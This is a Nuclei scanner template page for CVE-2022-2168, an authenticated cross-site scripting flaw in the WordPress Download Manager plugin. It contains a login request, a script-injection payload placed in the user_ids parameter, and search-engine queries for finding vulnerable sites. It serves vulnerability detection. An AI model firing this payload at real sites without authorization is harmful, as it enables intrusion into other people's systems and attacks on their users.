Skip to content
Nuclei Templates

WordPress Download Manager < 3.2.44 - Authenticated Cross-Site Scripting

ID: CVE-2022-2168

Severity: medium

Author: ritikchaddha

Tags: cve,cve2022,wp,wordpress,wp-plugin,xss,download-manager,authenticated

Description

Section titled “Description”

The WordPress Download Manager plugin before version 3.2.44 does not properly sanitize and escape the user_ids parameter in the stats history dashboard. This allows authenticated attackers to perform Cross-Site Scripting attacks by injecting malicious JavaScript code.

YAML Source

Section titled “YAML Source”
id: CVE-2022-2168


info:
  name: WordPress Download Manager < 3.2.44 - Authenticated Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The WordPress Download Manager plugin before version 3.2.44 does not properly sanitize and escape the user_ids parameter in the stats history dashboard. This allows authenticated attackers to perform Cross-Site Scripting attacks by injecting malicious JavaScript code.
  remediation: |
    Update the WordPress Download Manager plugin to version 3.2.44 or later.
  reference:
    - https://wpscan.com/vulnerability/66789b32-049e-4440-8b19-658649851010/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2168
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-2168
    cwe-id: CWE-79
    cpe: cpe:2.3:a:w3eden:download_manager:*:*:*:*:free:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: w3eden
    product: download_manager
    fofa-query: body="wp-content/plugins/download-manager/"
    google-query: inurl:"/wp-content/plugins/download-manager/"
    shodan-query: html:"wp-content/plugins/download-manager/"
  tags: cve,cve2022,wp,wordpress,wp-plugin,xss,download-manager,authenticated


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1


      - |
        GET /wp-admin/edit.php?post_type=wpdmpro&page=wpdm-stats&type=history&user_ids[]=1&"><script>alert('document_domain')</script> HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert('document_domain')</script>"
          - "No downloads found"
        condition: and


      - type: word
        part: header
        words:
          - text/html


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100eea16f32c489672c5067f36c87194c4f2421327a825da2378c96d5c23273629c022100a666c8b9e3bbfbc867d10a32ba41c81928f130dbbe979d437e6f6b02682f31c6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-2168.yaml"

View on Github